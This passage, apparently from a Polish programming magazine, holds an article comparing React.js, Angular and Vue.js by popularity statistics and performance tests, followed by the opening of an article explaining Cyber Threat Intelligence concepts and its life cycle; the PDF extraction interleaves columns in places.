JavaScript, tym samym dostarczając użytkownikowi prosty interfejs
graficzny [2].
Obecnie wiele rozwiązań webowych bazuje na architekturze
klient-serwer, gdzie rolę klienta pełni frontend aplikacji. W ten spo-
sób odchodzi się od renderowania widoków po stronie serwera, za-
pewniając przy tym ograniczenie jego obciążenia czy też przyspiesze-
nie wyświetlania elementów strony [3]. Takie podejście do budowania
aplikacji internetowych wymaga zastosowania danego frameworku1,
czyli szkieletu oprogramowania, który określa jego strukturę, mecha-
nizm działania oraz dostarcza zestaw potrzebnych narzędzi.
W ostatnich latach frameworkami języka JavaScript cieszącymi się
największą popularnością są technologie React.js, Angular oraz Vue.js.
Z tego względu w ramach niniejszego artykułu przeprowadzimy anali-
zę porównawczą tych trzech rozwiązań w celu wyłonienia zastosowań,
dla których najlepszym wyborem będzie konkretny framework.
Przytoczone biblioteki w przeciwieństwie do tzw. Vanilla JS, który
cechuje się wykorzystaniem czystego języka JavaScript, charakteryzują
się mniejszym progiem wejścia dla programisty. Ze względu na zestaw
gotowych narzędzi ułatwiają tworzenie aplikacji o wysokiej wydajności
oraz bezpieczeństwie, kiedy przez brak automatyzacji w Vanilla JS o te
kwestie musi zadbać programista, co często wiąże się z obniżeniem wy-
dajności aplikacji przez niestosowanie dobrych praktyk [4].
1. Z omawianych technologii jedynie React.js jest określany jako biblioteka języka JavaScript, a nie
framework. React.js nie narzuca danego wzorca architektonicznego, a jego funkcjonalności można
wdrażać stopniowo do budowanego projektu. Jednak w celu uspójnienia nazewnictwa określenia
framework będziemy używać w kontekście wszystkich trzech technologii.
<40> { 2 / 2022
PRZEDSTAWIENIE TECHNOLOGII
Wszystkie wspomniane frameworki, tj. React.js, Angular oraz Vue.js,
są technologiami open-sourcowymi, które powstały w przeciągu ostat-
niego dziesięciolecia. Jako rozwiązania wieloplatformowe wspierają
działanie aplikacji w większości przeglądarek internetowych. Stano-
wią zestaw narzędzi doskonale nadającymi się do budowy aplikacji
typu SPA (ang. Single Page Application). Ich głównym założeniem jest
redukcja powtarzalności kodu, dostarczając możliwość definiowa-
nia reużywalnych komponentów [3]. Wszystkie te cechy sprawiają,
że wspomniane biblioteki cieszą się wysoką popularnością, są często
wykorzystywane zarówno przez duże korporacje, jak i indywidual-
nych użytkowników. Posiadają dużą rzeszę zwolenników, tworząc ak-
tywne społeczności, które wspierają ich rozwój.
Angular
Angular to stworzony przez Google następca jednego z pierwszych
frameworków przeznaczonego do budowy aplikacji typu SPA –
AngularJS. Główną różnicą między tymi rozwiązaniami jest fakt,
iż Angular jest oparty na języku TypeScript, tym samym zapewnia-
jąc większą optymalizację kodu i detekcję błędów dzięki statycznemu
typowaniu zmiennych [3]. Dodatkowo dostarcza zwiększoną wydaj-
ność oraz więcej funkcjonalności względem swojego poprzednika.
Budowa aplikacji w Angularze opiera się na tworzeniu szablonów
HTML, pisaniu klas komponentów do zarządzania tymi szablonami,
dodaniu logiki aplikacji w serwisach oraz łączeniu komponentów
i serwisów w moduły [5]. Angular dostarcza takie rozwiązania jak
dwukierunkowe wiązanie danych, które pozwala na jednoczesne na-
słuchiwanie zdarzeń, a także aktualizowanie wartości między kom-
ponentami nadrzędnymi i podrzędnymi. Kwestią, na którą twórcy
Angulara kładą szczególny nacisk, jest separacja logiki aplikacji od
manipulacji w DOM (ang. Document Object Model) [6] oraz testo-
wanie kodu [7].
React.js
React.js jest technologią stworzoną przez firmę Facebook. Głównym
celem Reacta jest tworzenie interaktywnych interfejsów użytkowni-
ka z komponentów wielokrotnego użytku. Jednym z wyznaczników
Reacta jest nakładka języka JavaScript JSX (JavaScript XML), która
< 101 > }
 / Porównanie technologii JavaScript do tworzenia aplikacji webowych /

pozwala na wstawianie znaczników HTML bezpośrednio w kodzie

UDZIAŁ FRAMEWORKÓW NA RYNKU
JS, w ten sposób łącząc logikę obsługi z logiką wyświetlania kompo-
nentu [5]. React wykorzystuje tzw. wirtualny DOM – kopię rzeczywi- Statystyki z portalu Stack Overflow
stego modelu, a następnie na bieżąco wykrywa różnicę między wirtu-
alną a rzeczywistą strukturą, aktualizując rzeczywisty model jedynie Na wykresie widocznym na Rysunku 1 przedstawiono tendencję licz-
o elementy, które uległy zmianie, powodując bardzo szybkie odświe- by pytań związanych z poszczególnymi technologiami na przestrzeni
żanie widoków. Kolejną kluczową cechą Reacta jest jednokierunkowe ostatnich lat na portalu Stack Overflow. Największą popularnością
wiązanie danych, w którym przepływ danych przebiega w dół hie- cieszy się biblioteka React.js, ponieważ jej tag (reactjs) występuje naj-
rarchii komponentów, od komponentu nadrzędnego do komponentu częściej w pytaniach. Na podstawie wykresu widzimy również, że jej
potomnego. Komponent nadrzędny przekazuje kopię swojego stanu popularność ciągle wzrasta.
swoim komponentom potomnym za pomocą właściwości (ang. pro-
perties), a następnie komponenty potomne mogą komunikować się
z rodzicem w celu aktualizacji stanu za pomocą wywołań zwrotnych
(ang. callback) [9]. W React tworzenie interfejsów następuje w spo-
sób deklaratywny. Oznacza to, że podczas pisania komponentu, po-
przez modyfikację stanu, określamy, jakie zmiany chcemy zaobser-
wować, a React zajmuje się ich obsługą.

Vue.js
Vue.js to najnowsze z porównywanych rozwiązań, z pierwszą stabil-
ną wersją opublikowaną w 2014 roku przez Evana You. W przeci-
wieństwie do React.js oraz Angular jest całkowicie wspierany przez
open-sourcową społeczność [A]. Vue.js to progresywny framework,
którego rozmiar nie przekracza ok. 20 kB. Progresywność tego roz- Rysunek 1. Porównanie liczby postów w miesiącu na portalu Stack Overflow dla poszcze-
wiązania można rozumieć jako możliwość dopasowania zakresu, gólnych technologii [C]

w którym będzie on zastosowany, od pojedynczej biblioteki do war-
stwy widoku aż po szkielet aplikacji [B]. Vue.js implementuje wzo-
rzec architektoniczny MVVM (ang. Model-View-ViewModel), dzięki
czemu pozwala na oddzielenie GUI aplikacji od logiki biznesowej.
Podobnie jak React.js, operuje na wirtualnym DOM, minimalizując
koszt aktualizacji oryginalnego DOM. Budowanie aplikacji w Vue.js
opiera się na użyciu dyrektyw, czyli atrybutów HTML umożliwia-
jących różne metody wiązania danych [A]. W celu zarządzania sta-
nem rozbudowanych aplikacji Vue udostępnia bibliotekę Vuex,
która działa jak scentralizowany magazyn stanów dla wszystkich
komponentów [B].
W przypadku frameworku Vue.js widzimy rosnący trend w zaintere-
sowaniu użytkowników aż do 2020 roku, po którym nastąpiła stabi-
lizacja. Jednak jest to wciąż najmniej popularny framework na Stack
Overflow w porównaniu do reszty badanych frameworków.
Brak kompatybilności wstecznej oraz prostej ścieżki aktualizacji apli-
kacji z AngularJS do Angular w naturalny sposób sprawiły, że od 2016
roku spada zainteresowanie użytkowników frameworkiem AngularJS na
korzyść nowszego Angulara. Jednak w porównaniu do pozostałych fra-
meworków zarówno AngularJS, jak i Angular powoli tracą popularność.
Na Rysunku 2 przedstawiono sondaż przeprowadzony przez
Stack Overflow w 2021 roku na podstawie opinii ponad 66 000 ankie-

Rysunek 2. Najbardziej (po prawej) oraz najmniej (po lewej) lubiane technologie do tworzenia aplikacji webowych [D]

{ WWW.PROGRAMISTAMAG.PL } <41>
PROGRAMOWANIE APLIKACJI WEBOWYCH

towanych. Zgodnie z wynikami najbardziej lubianym frameworkiem Vue.js, co może świadczyć o rosnącej popularności tej technologii.
do tworzenia aplikacji webowych jest React.js (69.28%). Niewiele Warto zaznaczyć jednak, że liczba odznaczeń Vue.js może być natu-
mniej (64.41%) ma Vue.js, bo tylko 35.59% ankietowanych deklaruje ralnym skutkiem dynamicznie rosnącej liczby użytkowników doce-
niechęć wobec tej technologii. Nieco mniejsze wsparcie (55.82%) ma lowych. Swoje zainteresowanie tym frameworkiem wykazały między
z kolei framework Angular. innymi takie firmy jak Alibaba, Wizzair czy Netflix.
Na diagramie widocznym na Rysunku 3 przedstawiono procent
zainteresowania ankietowanych technologiami, których badani na co React.js Vue.js Angular
dzień nie używają. Analiza tych wyników pokazuje, że ponad 25%
ankietowanych chciałoby użyć frameworku React.js do tworzenia Liczba publicznych
183 690 39 154 35 921
aplikacji webowych. Nieco mniejsze (16.69%) zainteresowanie ma repozytoriów

Vue.js, a tylko 8.47% ankietowanych zadeklarowało chęć wypróbo-

wania technologii Angular. Liczba gwiazdek 180 931 192 394 86 541

Dane z portalu GitHub Tabela 1. Porównanie liczby publicznych repozytoriów oraz liczby gwiazdek dla poszczegól-
nych technologii na dzień 18.01.2022 [E,F,10]

Na podstawie statystyk opublikowanych przez GitHub możemy za-

uważyć, że najwięcej (w porównaniu do reszty) publicznych repozy-
toriów jest związanych z frameworkiem React.js, co może świadczyć
o tym, że programiści chętniej sięgają po tę technologię przy two-
rzeniu nowych aplikacji webowych. Z kolei najwięcej odznaczeń ma
Statystyki NPM
Analizując wykres na Rysunku 5, liczby pobrań NPM w ciągu 5
ostatnich lat (2017 – 2022), możemy zauważyć, że Angular z czasem

Rysunek 3. Najbardziej pożądane technologie do tworzenia aplikacji webowych [A]

Rysunek 4. Porównanie liczby pobrań NPM dla poszczególnych technologii [11]

<42> { 2 / 2022 < 101 > }

 / Porównanie technologii JavaScript do tworzenia aplikacji webowych /

powoli traci swoją początkową przewagę nad Vue.js. W przypad- Przeprowadzone testy polegały na wielokrotnym wykonaniu prób
ku frameworku React widzimy, że stabilnie zachowuje on pozycję badawczych, a finalny rezultat został uzyskany poprzez medianę wszyst-
dominującą. kich pomiarów.
Badania zostały przeprowadzone na komputerze o parametrach:

PORÓWNANIE WYDAJNOŚCI » czterordzeniowy procesor Intel Core i5-4460 @ 3.20GHz,

» pamięć RAM 16 GB,
FRAMEWORKÓW » dysk SSD 256 GB,
» system operacyjny Windows 10 Pro 64-bit.
Badane aspekty
Podczas porównania aplikacji utworzonych w omawianych technolo- Aplikacje uruchomiono w przeglądarce Google Chrome w wersji 98,
giach uwzględniono kilka kryteriów: a wyniki zebrano przy pomocy zakładki Performance w DevTools.
» Application bootstrapping – określenie to odnosi się do wszel-
kich miar związanych z procesem kompilacji, uruchamiania
Uzyskane wyniki
oraz pracy aplikacji [12]. Podczas badania tego kryterium zosta-
ły porównane m.in. czas zbudowania aplikacji, czas jej urucho- Korzystając z przygotowanych aplikacji testowych (szkielety projek-
mienia oraz rozmiar zajętego przez nią miejsca na dysku. tów + 3 proste funkcjonalności), w Tabeli 2 przedstawiono zestawie-
» Lazy loading – technika ta polega na zaniechaniu pobierania nie mierzalnych parametrów istotnych dla porównania omawianych
z serwera wszystkich zasobów w jednym momencie. W zamian narzędzi.
wymiana danych między przeglądarką a serwerem odbywa się
w sposób etapowy: w pierwszej kolejności pobierane są niewiel- Angular React.js Vue.js
kie, lecz obowiązkowe do wyświetlenia strony dane, a elementy Ilość plików 42 474 33 299 23 775
charakteryzujące się największym rozmiarem, takie jak grafiki
Rozmiar projektu 592 MB 215 MB 127 MB
lub obszerne ilości tekstu ładowane, są w tle i prezentowane na
już wyrenderowanej stronie, gdy proces ich pobierania zostanie Czas instalacji paczek (liczba
165 s (893) 174 s (1408) 148 s (1339)
zakończony [13]. W trakcie badania tego kryterium sprawdzi- paczek)

my czas i sposób działania tej techniki w ramach poszczegól- Czas budowy aplikacji 14 173 ms 12 159 ms 7 093 ms
nych frameworków.
Rozmiar zbudowanej aplikacji 1.15 MB 1.61 MB 1.96 MB
» Bulk data – zagadnienie to tyczy się jednoczesnego ładowania
dużej ilości danych, np. tabeli zawierającej kilka tysięcy re- Czas uruchomienia aplikacji 7 385 ms 2 757 ms 2 009 ms
kordów bezpośrednio z kodu aplikacji. Badając to kryterium,
sprawdzony został czas trwania takich operacji w zależności od Tabela 2. Parametry projektów i application bootstrapping

typu oraz ilości danych.

» Pobieranie danych z API – w ramach tego badania sprawdzony Dla większości parametrów da się zaobserwować zdecydowaną prze-
został czas załadowania oraz wyrenderowania danych pobra- wagę frameworku Vue.js, natomiast framework Angular wypadł naj-
nych z niezwiązanego z aplikacją serwisu. mniej korzystnie. Wyjątkiem od tej zależności były parametry czasu
instalacji paczek oraz rozmiaru zbudowanej aplikacji, gdzie Angular
W celu zbadania kryterium application bootstrapping dla każdego radzi sobie zdecydowanie lepiej. Dla frameworku React.js najczęściej
frameworku wykonano badania na czystym środowisku testowym, uzyskiwano pośrednie rezultaty.
które obejmowało pobranie oraz instalację wymaganych paczek, zbu- Następnie korzystając z funkcjonalności zaimplementowanych
dowanie projektu, a także jego uruchomienie. Następnie został wy- w aplikacjach testowych, dokonano testów wydajnościowych oma-
konany pomiar wszelkich możliwych do porównania wartości takich wianych technologii.
jak liczba plików, rozmiary projektu oraz czasy instalacji, budowy
i uruchomienia aplikacji. Angular React.js Vue.js
Aby zbadać wydajność poszczególnych frameworków w przy-
Lazy loading 2 674 ms 2 525 ms 2 732 ms
padku lazy loading, zbadany został czas załadowania 100 bloków
tekstu składających się z prawie 9000 wyrazów bezpośrednio z kodu Bulk data 1 757 ms 1 926 ms 1 449 ms
aplikacji.
Badanie kryterium bulk data polegało na sprawdzeniu czasu za- Pobieranie danych z API 9 330 ms 9 380 ms 8 363 ms

ładowania elementów z danymi do tabeli dla każdej badanej techno-

logii. Dane były pobierane z pliku JSON, który zawierał 10000 rekor-
dów, każdy zawierający po 4 pola.
Sprawdzenie wydajności komunikacji omawianych frameworków
z API polegało na obserwacji czasu pobrania danych z zewnętrznego
serwera [14] przy pomocy zapytania. Następnie wyświetlono 5000
rekordów zawierających tekst i grafiki jako wiersze tabeli HTML.
Tabela 3. Wyniki metod testowych
W przypadku badania Lazy loadingu to React.js notował najlepsze
wyniki, a zaraz po nim Angular oraz Vue.js. Wyniki są jednak na tyle
do siebie zbliżone, że można je określić jako niezauważalne dla użyt-
kownika aplikacji.

{ WWW.PROGRAMISTAMAG.PL } <43>
PROGRAMOWANIE APLIKACJI WEBOWYCH

W badaniu Bulk data najlepiej wypadł Vue.js, znacząco pokonu-
jąc drugi framework Angular oraz trzeci React.js.
W teście badającym pobieranie danych z API przy pomocy za-
pytań oraz wyświetlaniu ich w postaci tabeli znów najlepiej wypadł
Vue.js. Mediana z wyników frameworków Angular oraz React.js jest
praktycznie identyczna.
Patrząc na ogół wyników wygenerowanych w testach wydajno-
ściowych pobierania danych z API, dało się zaobserwować ich roz-
bieżność dla frameworku Angular. Potrafił on, w przypadkach gra-
nicznych, pobrać i wyświetlić dane w czasie szybszym niż Vue.js,
a czasami wolniejszym niż 10000 ms. Pozostałe frameworki cecho-
wały się wyższą stabilnością.
wydajnościowych. Jednakże jest to najmłodsze rozwiązanie i mimo
wciąż rosnącej popularności ma mniej rozbudowaną społeczność.
React.js jest dojrzałym frameworkiem, zdecydowanie wygrywa
w porównaniu biznesowym bibliotek – ma największą liczbę projek-
tów, jest wskazywany jako najpopularniejsza i najbardziej pożądana
technologia na rynku komercyjnym. Bibliotekę React.js można uznać
za kompromis między Angularem i Vue.js, gdyż cechuje się porów-
nywalną wydajnością. Znajduje zastosowanie w małych i dużych
projektach, przy czym ma mniejszy próg wejścia dla programisty niż
Angular.
Mimo zauważalnych różnic między frameworkami nie da się
jednoznacznie odpowiedzieć na pytanie, które rozwiązanie wybrać.
Przy ostatecznym wyborze musimy kierować się specyfiką produktu,

KTÓRY FRAMEWORK WYBRAĆ?
Przy pomocy przeprowadzonej analizy biznesowej oraz uzyskanych
wyników badań można zaobserwować różnice między porównywa-
nymi technologiami. Zauważone rozbieżności pozwalają na wskaza-
nie najlepszych zastosowań dla badanych bibliotek.
Angular jest najbardziej rozbudowanym frameworkiem, cechuje
go większy rozmiar projektu, ale jednocześnie daje więcej możliwo-
ści i znajduje zastosowanie w przypadku dużych, zaawansowanych
projektów. Angular domyślnie dostarcza wiele gotowych funkcjo-
nalności, jest bardzo kompletnym rozwiązaniem, co wiąże się z jego
rozmiarem. Ze względu na swoją złożoność ma większy próg wej-
ścia, co może mieć swoje odzwierciedlenie w jego popularności na
rynku.
Framework Vue.js jest lekkim i bardzo wydajnym rozwiązaniem.
Charakteryzuje go niski próg wejścia, przez co jest częstym wyborem
wśród początkujących programistów. Vue.js zapewnia bazową funk-
cjonalność, jest dobrym rozwiązaniem do małych, nieskomplikowa-
nych projektów, co potwierdzają wyniki przeprowadzonych testów
który chcemy stworzyć. W zależności od wymagań projektu należy
zawsze rozeznać się w rozwiązaniach dostarczanych przez frame-
work, w tym gotowych funkcjonalności i dostępnych bibliotek. Może
to znacząco przyspieszyć proces wytwarzania produktu i spełnienia
jego wymagań biznesowych. Nie możemy jednak zapomnieć o zaso-
bach, którymi dysponujemy. Skupiając się na zasobach ludzkich, ze-
spół developerów często wyspecjalizowany jest w danej technologii.
W większości przypadków nakład pracy związany ze zmianą tech-
nologii przewyższy korzyści płynące z lepszego dostosowania innej
biblioteki do specyfiki produktu.
Autorami artykułu są Joanna Borowska, Rafał Latoszek, Justyna
Łapińska, Karol Stasiak – studenci ostatniego roku Informatyki Sto-
sowanej drugiego stopnia na wydziale Elektrycznym Politechniki
Warszawskiej. W ramach pracy nad projektem badawczym posta-
nowili zagłębić się w tematykę technologii frontendowych aplikacji
webowych, które tak często są spotykane na rynku komercyjnym
czy też w projektach akademickich.

Bibliografia
[0] https://www.electronjs.org/
[1] https://cordova.apache.org/
[2] Yuan-Fang Li, Paramjit K. Das, David L. Dowe, 2014. Two decades of Web application testing—A survey of recent advances
[3] Bin Uzayr, S., Cloud, N., Ambler, T., 2019. JavaScript Frameworks for Modern Web Development. New York: Apress
[4] https://gomakethings.com/why-do-people-choose-frameworks-over-vanilla-js/
[5] https://angular.io/guide/architecture
[6] https://www.w3.org/TR/WD-DOM/introduction.html
[7] Monteiro, F., 2018. Hands-On Full Stack Web Development with Angular 6 and Laravel 5: Become Fluent in Both Frontend and Backend Web Development with Docker, Angular and
Laravel. Birmingham: Packt Publishing, Limited
[8] https://reactjs.org/docs/introducing-jsx.html
[9] Chiarelli, A., 2018. Beginning React. Birmingham: Packt Publishing, Limited
[A] Filipova, O., 2018. Vue.js 2: Tworzenie reaktywnych aplikacji WWW. Warszawa: Helion
[B] Nelson, B., 2018. Getting to Know Vue.js. New York: Apress
[C] https://insights.stackoverflow.com/trends?tags=reactjs%2Cvue.js%2Cangular%2Cangularjs
[D] https://insights.stackoverflow.com/survey/2021#technology-most-loved-dreaded-and-wanted
[E] https://github.com/topics/react
[F] https://github.com/topics/vue
[10] https://github.com/topics/angular
[11] https://www.npmtrends.com/angular-vs-react-vs-vue
[12] https://techterms.com/definition/bootstrap
[13] https://developer.mozilla.org/en-US/docs/Web/Performance/Lazy_loading
[14] https://jsonplaceholder.typicode.com/

<44> { 2 / 2022 < 101 > }

BEZPIECZEŃSTWO

Cyber Threat Intelligence – czym jest i dlaczego jest ważne

Angielski filozof sir Francis Bacon jest autorem słów „scientia potentia est”, czyli „wiedza
to potęga”. Pierwszy raz zapisał je w swojej książce w 1668 roku Thomas Hobbes, który był
asystentem Bacon’a.Interpretując te słowa, można stwierdzić, że im więcej wiemy, tym staje-
my się potężniejsi. Odpowiednia wiedza pozwala osiągnąć więcej, dając nam przewagę nad
innymi w niemal każdym aspekcie życia.

W iedza jest darmowa, a w obecnej dobie jest również łatwo do-

stępna. Można ją pozyskiwać z różnych źródeł, zarówno za-
mkniętych, jak i otwartych.
CTI to działania wywiadowcze mające na celu identyfikację po-
tencjalnych zagrożeń, które czają się w cyberprzestrzeni.
Zapewnienie bezpieczeństwa organizacji od strony technologicz-
nej to nie lada wyzwanie. Nikt przecież nie chce paść ofiarą włamania

INTELLIGENCE do infrastruktury i w konsekwencji utracić dane klientów lub tajem-

nic handlowych czy też aby jego dyski zostały zaszyfrowane.
Samo słowo intelligence1 w dokładnym znaczeniu z języka angielskie- Może to doprowadzić do nadszarpnięcia wizerunku oraz utraty
go oznacza informacje wywiadowcze, tajne informacje pozyskiwane wiarygodności, jak również przerwania ciągłości działania i w konse-
przez wywiad. kwencji bankructwa.
Skoro intelligence to informacje wywiadowcze, to czy ich pozy- Do cyberprzestępców, którzy mogą wyrządzić mniejsze lub więk-
skiwanie jest ograniczone tylko dla instytucji zawodowo zajmujących sze szkody, możemy zaliczyć zwykłych chuliganów, tzw. script kid-
się wywiadem, takich jak CIA i jej podobnych? dies, haktywistów czy zorganizowane grupy przestępcze oraz grupy
Otóż nie do końca. Samo określenie intelligence możemy zdefinio- sponsorowane przez rządy (APT – Advanced Persistent Threat).
wać jako zbiór informacji, które w efekcie dają wiedzę w celu odpo- Aby móc skutecznie bronić się przed określonymi zagrożeniami,
wiedzenia na kluczowe pytania kto, gdzie, jak, co, dlaczego oraz kiedy. musimy być w stanie je odpowiednio zidentyfikować oraz ocenić.
To wiedza na temat otaczającego nas świata. Analizując dostępne dane, niektóre z nich jesteśmy w stanie ła-
Czy w takim razie dane wywiadowcze może pozyskiwać każdy two identyfikować. Gdy jednak chcemy poznać więcej szczegółów,
z nas? Zdecydowanie tak. A co najistotniejsze, robimy to każdego tym poszukiwania i proces identyfikacji stają się coraz bardziej
dnia. Chcąc dowiedzieć się więcej na dany temat i odpowiedzieć na skomplikowane.
wcześniej postawione pytania, poszukujemy danych i informacji, Ten problem najlepiej ilustruje opracowana przez Davida J. Bian-
które dadzą nam odpowiednią wiedzę. co tzw. piramida bólu (Rysunek 1).
Jako przykład z życia może nam posłużyć sytuacja, kiedy chcemy
kupić mieszkanie w określonej dzielnicy miasta. Szukamy wtedy in-
formacji na temat dostępności podstawowych usług w okolicy, takich
jak placówki medyczne, przedszkola/szkoły, przystanki komunikacji
miejskiej i innych.
Weryfikujemy też ceny z rynku pierwotnego i wtórnego. Pytamy
znajomych, czy wiedzą coś na temat danej okolicy pod względem
bezpieczeństwa dla nas samych oraz naszego mienia, takiego jak sa-
mochód, który będzie zaparkowany na ulicy. Oraz wiele innych.
Tym samym uzyskujemy informacje, które są odpowiedzią na
postawione pytania i dają nam stosowną wiedzę, która pomaga nam
w podjęciu ostatecznej decyzji na temat inwestycji.
Działania, jakie podejmujemy, mają uchronić nas przed różnego ro- Rysunek 1. Piramida bólu2
dzaju zagrożeniem, które próbujemy zidentyfikować, przeprowadzając
w ten sposób nasz własny Threat Intelligence, czyli wywiad zagrożeń. Dane leżące u podnóża piramidy są stosunkowo łatwe do znalezienia
i identyfikacji. Im jednak bliżej wierzchołka, tym poziom trudności

CYBER THREAT INTELLIGENCE rośnie.

Generalna idea dla Cyber Threat Intelligence jest taka sama jak w przy-
toczonym wcześniej przykładzie, jednak zmienia się przestrzeń, w któ-
rej operujemy.
1. diki.pl/slownik-angielskiego?q=intelligence
Najtrudniej jest identyfikować tzw. TTPs, czyli taktyki, techniki
i procedury (Tactics, Techniques and Procedures), które według fra-
meworka MITRE ATT&CK3 określają, co agresorzy chcą osiągnąć
2. attackiq.com/2019/06/26/emulating-attacker-activities-and-the-pyramid-of-pain
3. attack.mitre.org

<46> { 2 / 2022 < 101 > }

 / Cyber Threat Intelligence – czym jest i dlaczego jest ważne /
(Tactics), w jaki sposób zamierzają (Techniques) oraz czego dokład-
nie, jeśli chodzi o narzędzia, w tym celu używają (Procedures).
Mając na uwadze ogrom danych, jaki nas otacza, a tym samym
powszechną dostępność Internetu, z czasem coraz trudniej jest się
przebić przez ich gąszcz i wyłuskać odpowiednie informacje dające
potrzebną wiedzę.
Dlatego istotne jest, by wiedzieć, w jaki sposób powinno się to
prawidłowo robić, aby wartość z działań CTI była jak największa.
W pierwszej kolejności musimy być świadomym, jaki związek zacho-
dzi między danymi, informacją a informacją wywiadowczą (Intelligence).
Na Rysunku 2 przedstawiono naturalną transformację surowych
danych w informacje wywiadowcze.
Rysunek 2. Proces transformacji danych w informacje wywiadowcze
Data to nic innego jak surowe dane – fakty, które są dostępne w ogrom-
nym zbiorze, który przeszukujemy.
Information odnosi się do efektu uzyskanego w wyniku zebrania
danych surowych w celu dostarczenia wartościowego outputu.
Intelligence, czyli właściwa wiedza wywiadowcza, powstaje na
skutek przetwarzania oraz analizy informacji i może być wykorzysta-
na podczas podejmowania decyzji.
CYBER THREAT INTELLIGENCE LIFE CYCLE
Mając już wstępne wyobrażenie, jak surowe dane są przekształcane
w informacje wywiadowcze, przyjrzyjmy się cyklowi życia procesu
CTI (Rysunek 3), który systematyzuje działania (fazy) w ramach ope-
racji Cyber Threat Intelligence.
Rysunek 3. Cykl życia procesu Cyber Threat Intelligence4
Direction
Pierwsza faza CTI jest odpowiedzialna za zdefiniowanie wymagań,
jakie ma podmiot, który będzie konsumował wyniki z całego proce-
4. agari.com/email-security-blog/what-is-cyber-threat-intelligence
{ WWW.PROGRAMISTAMAG.PL }
su. Wymagania te nazywane są Intelligence Requirements (IR) lub też
Priority Intelligence Requirements (PIR).
Mają one za zadanie postawienie pytań, na które należy spróbo-
wać odpowiedzieć, np. jaki jest aktualny krajobraz zagrożeń (ang.
Threat Landscape), a także jakie środki należy przedsięwziąć, aby im
zapobiec.
Poprzez poprawne zdefiniowanie wymagań, a tym samym kie-
runku, w jakim analiza ma być prowadzona, by je zaspokoić, jeste-
śmy w stanie określić, jakich danych będziemy potrzebować, aby zre-
alizować założone cele.
Określenie rodzaju danych pozwala również na skuteczny wybór
ich źródła, co daje możliwość uniknięcia potencjalnych szumów in-
formacyjnych, które mogą prowadzić do błędnej analizy, a tym sa-
mym skutkować podjęciem niewłaściwych decyzji.
W niektórych opracowaniach ta faza może nosić nazwę Direction
and Planning.
Collection
W tej części procesu następuje właściwa kolekcja danych, które zo-
stały wyselekcjonowane w poprzednim etapie.
W zależności od tego, jakie źródła danych zostały określone
na etapie planowania, proces kolekcji może obejmować logi z we-
wnętrznych systemów infrastruktury (urządzenia sieciowe, firewalle,
SIEM itp.), inne raporty CTI lub opracowania indywidualnych bada-
czy bezpieczeństwa.
Bardzo wartościowym źródłem danych jest tak zwany biały wy-
wiad, czyli OSINT (Open Source Intelligence).
Processing
Surowe dane, które zostały pozyskane w fazie kolekcji, muszą zostać
poddane obróbce w celu ich normalizacji do ustalonego wcześniej,
wspólnego formatu. Jest to niezwykle istotne, ponieważ część czyn-
ności w fazie analizy jest przeprowadzana przez narzędzia automaty-
zujące, które przyjmują dane wejściowe w określonym formacie.
Również analityk musi rozumieć analizowane dane, dlatego faza
przetwarzania jest bardzo istotna.
W ramach przetwarzania może dochodzić np. do dekodowania
oraz tagowania pewnych danych, tak aby były łatwiej konsumowane
podczas fazy analizy.
W wyniku działania fazy przetwarzania surowe dane przekształ-
cane są w informacje.
Analysis
Jest to najbardziej czasochłonna faza z całego cyklu życia CTI, ponie-
waż w jej trakcie wszystkie uzyskane wcześniej informacje łączone są
w spójną całość, tak aby dostarczyć odpowiedzi na pytania postawio-
ne w fazie definiowania wymagań (IR lub PIR).
Czynności analityczne prowadzone są na ogół przez ludzi przy
wspomaganiu narzędzi automatyzujących.
Produktem końcowym tej fazy są informacje wywiadowcze, czyli
nasz intelligence. Najczęściej są one przekazywane w formie raportu.
<47>
BEZPIECZEŃSTWO
Dissemination
Po przygotowaniu raportu w poprzedniej fazie musi on trafić do odpo-
wiedniej grupy odbiorców, która będzie dalej wykorzystywać zdobyte
informacje wywiadowcze, tak aby byli oni w stanie podjąć odpowied-
nie decyzje.
W zależności od typu przygotowanego raportu (strategiczny, ope-
racyjny, taktyczny, techniczny) częstotliwość dostarczania raportu
może się różnić. I tak np. raport strategiczny może być dostarczany
raz na kwartał. Już jednak raport operacyjny powinien być dostarcza-
ny znacznie częściej, np. raz na tydzień.
Typy raportu CTI zostaną omówione w dalszej części artykułu.
Feedback
Ostatnia faza cyklu w całym procesie pozwala na zebranie informacji
zwrotnej od odbiorców raportu oraz samych analityków.
Tym samym następuje ewaluacja wcześniej ustalonych kierun-
ków działania (IR oraz PIR). W wyniku takiego działania może dojść
do powstania nowych kierunków.
Gdy całość informacji zwrotnych jest zebrana, cały proces zaczy-
na się od początku, ponieważ działania w ramach CTI nie są jednora-
zowymi przedsięwzięciami, lecz procesem ciągłym.
RODZAJE CYBER THREAT
INTELLIGENCE
Gdy już mamy obraz tego, jak wygląda cykl życia całego procesu CTI,
możemy przejść do omówienia rodzajów CTI.
Aby skutecznie realizować operacje CTI, należy mieć świado-
mość, jakiego rodzaju informacje wywiadowcze powstają w wyniku
ich przeprowadzania.
Odpowiednia klasyfikacja na strategiczne, operacyjne, taktyczne
i techniczne determinuje przede wszystkim to, do jakiej grupy od-
biorców trafiają poszczególne raporty oraz jakiego rodzaju cele defi-
niowane są w pierwszej fazie cyklu życia CTI.
Strategiczny
Raport tego typu dostarcza wysokopoziomowych informacji na te-
mat aktualnej świadomości przedsiębiorstwa w zakresie cyberzagro-
żeń (trendów tych zagrożeń), które mają miejsce.
Tworzony jest tak zwany threat landscape, czyli krajobraz zagro-
żeń, który aktualnie ma miejsce w odniesieniu do przedsiębiorstwa,
ale również rodzaju branży, w jakiej to przedsiębiorstwo działa.
W wyniku identyfikacji typów zagrożeń raport powinien również
dostarczać informacji, jak organizacja jest przygotowana na sytuację,
w której dane zagrożenie może się zmaterializować, jaki jest poziom
realnego wystąpienia określonego zagrożenia, np. zaszyfrowania
wszystkich wrażliwych danych. Tym samym podejmowane są próby
określenia potencjalnych skutków finansowych oraz ciągłości działa-
nia biznesu.
Na bazie tych informacji nietechniczni decydenci organizacji
oraz osoby takie jak CISO (Chief Information Security Officer), do
których raport jest skierowany, mogą podejmować decyzje związane
<48> { 2 / 2022
z budżetem przeznaczonym na bezpieczeństwo. Pozwala on również
na opracowywanie strategii bezpieczeństwa całej organizacji, czyli
co powinno być wdrożone, aby zminimalizować wystąpienie danego
zagrożenia.
Ponieważ raport jest przeznaczony do osób decyzyjnych oraz
ukierunkowany na możliwościach i skutkach wystąpienia zagrożenia,
powinien on być opracowany bez użycia języka technicznego.
Raport tego rodzaju może być wykorzystywany w dłuższym okre-
sie czasu, gdzie dopiero po wdrożeniu strategicznych decyzji organi-
